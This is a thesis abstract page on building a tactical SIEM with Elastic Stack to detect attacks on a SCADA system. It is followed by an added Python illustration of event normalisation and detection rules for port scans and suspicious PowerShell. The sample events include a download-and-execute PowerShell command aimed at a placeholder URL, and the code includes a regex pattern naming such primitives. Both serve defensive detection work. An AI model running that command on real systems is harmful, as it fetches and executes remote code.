Tactical SIEM for Continuous SCADA System Cyber Threat Monitoring
Kujala, Johannes (2024)
Master's Programme in Electrical Engineering
Faculty of Information Technology and Communication Sciences
This publication is copyrighted. You may download, display and print it for your own personal use. Commercial use is prohibited.
Approval date
2024-05-31
The permanent address of the publication is
https://urn.fi/URN:NBN:fi:tuni-202405095613
Abstract
Critical infrastructure is considered an asset or system which is essential for maintaining the crucial functions of our society. Cyberattacks on these critical infrastructure systems have become more common in recent years. In 2009-2010, a malware named Stuxnet was used to damage an Iranian uranium enrichment facility. In 2015 and 2016, two different pieces of malware were used to cause two separate power outages in Ukraine, impacting hundreds of thousands of customers.
This thesis introduces a Security Information and Event Management (SIEM) system as a means to prevent cyberattacks in SCADA environments, which are commonly used in supervising and controlling critical infrastructure. The objective of a SIEM system is to monitor the log events of all devices in the system and alert system operators if any suspicious activity is detected. A SIEM system should be able to collect log data from various devices and applications. In a critical infrastructure environment, these may include e.g. server computers, firewalls, IEDs, and SCADA software. The log events are then converted to a common format, as log data from different source devices should be comparable.
A SIEM system detects abnormalities by utilizing a rule engine configured by the system administrator. Detection rules can be either user-configured or pre-configured by the SIEM developer. The configuration and operation of the SIEM system is generally done in a separate user interface.
In this thesis, an objective was to build a tactical SIEM system, a SIEM that only collects a limited number of logs to keep the system simple to configure and administer. However, such a SIEM system should still be able to detect various potential attack vectors. The SIEM system to be implemented in a SCADA environment was configured using Elastic Stack. It was chosen in this thesis because of its modification capabilities and the easy availability of the software. The SIEM system is installed in a Windows-based virtual environment, in which the focus is on the Windows Event Logs.
After detection rules have been created in the SIEM system, their functionality can be verified by utilizing penetration testing. The objective of penetration testing is to simulate the actions of a potential cyber attacker in various ways. In this thesis, however, testing is executed quite superficially.
The SIEM system used in the thesis was found to be capable of detecting all attack vectors that were tested. For example, the tested attack vectors included port scans and PowerShell scripts containing suspicious elements. However, as the SIEM was configured and the penetration testing was conducted by the same person, the test results should not be directly applied to any real-world systems.
Overall, Elastic Stack is a well-functioning SIEM system that could be used in conjunction with a SCADA system in a critical infrastructure environment. However, operating and administering the software requires a rather different skillset than is needed in conventional SCADA engineering. Therefore, an alternative is proposed: configuring a SCADA application to be used as a lightweight SIEM system. The advantage would be that the SIEM configuration and operation would be carried out in a more familiar environment. The scope of monitored devices would, however, be significantly smaller. Therefore, this type of SCADA SIEM would only be feasible in specific compact SCADA environments with few perimeter devices.
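The abstract describes the two core steps of the tactical SIEM (normalising Windows events into a common format, then running detection rules over them) and names port scans and suspicious PowerShell scripts as the tested attack vectors. The following is an added illustration of that pipeline in Python; it is not code from the thesis, and the sample events, the ECS-style field names and the alert thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample Windows events (not from the thesis): two PowerShell
# script-block events (Event ID 4104) from an HMI and a burst of Windows
# Filtering Platform connection events (Event ID 5156) from a SCADA server.
RAW_EVENTS = [
    {"EventID": 4104, "Computer": "scada-hmi01", "ScriptBlockText":
        "IEX (New-Object Net.WebClient).DownloadString('http://placeholder/x.ps1')"},
    {"EventID": 4104, "Computer": "scada-hmi01", "ScriptBlockText":
        "Get-Service | Where-Object Status -eq Running"},
] + [
    {"EventID": 5156, "Computer": "scada-srv01", "SourceAddress": "10.0.0.99",
     "DestPort": str(p)} for p in range(20, 45)   # 25 distinct ports
]

def normalize(raw):
    """Map a raw Windows event to a common schema (ECS-style names, assumed)."""
    ev = {"host.name": raw["Computer"], "event.code": raw["EventID"]}
    if raw["EventID"] == 4104:                     # PowerShell script block
        ev["event.category"] = "process"
        ev["powershell.script_block_text"] = raw["ScriptBlockText"]
    elif raw["EventID"] == 5156:                   # permitted network connection
        ev["event.category"] = "network"
        ev["source.ip"] = raw["SourceAddress"]
        ev["destination.port"] = int(raw["DestPort"])
    return ev

# Tokens commonly flagged by SIEM rules: download-and-execute and encoding primitives.
SUSPICIOUS_PS = re.compile(
    r"IEX|Invoke-Expression|DownloadString|-enc(odedcommand)?\b|FromBase64String", re.I)

def rule_suspicious_powershell(events):
    """Rule 1: script-block events containing suspicious elements."""
    return [e for e in events if e.get("event.category") == "process"
            and SUSPICIOUS_PS.search(e["powershell.script_block_text"])]

def rule_port_scan(events, threshold=20):
    """Rule 2: one source touching >= threshold distinct ports on one host."""
    ports = defaultdict(set)
    for e in events:
        if e.get("event.category") == "network":
            ports[(e["source.ip"], e["host.name"])].add(e["destination.port"])
    return [{"source.ip": s, "host.name": h, "distinct_ports": len(p)}
            for (s, h), p in ports.items() if len(p) >= threshold]

def run_siem(raw_events):
    """Normalise all events once, then evaluate every rule against them."""
    events = [normalize(r) for r in raw_events]
    return {"powershell": rule_suspicious_powershell(events),
            "port_scan": rule_port_scan(events)}

if __name__ == "__main__":
    for name, alerts in run_siem(RAW_EVENTS).items():
        print(name, alerts)
```

The port-scan rule keys on (source, host) so that a multi-host scan raises one alert per target; a real deployment would also bound the time window, which the sample omits.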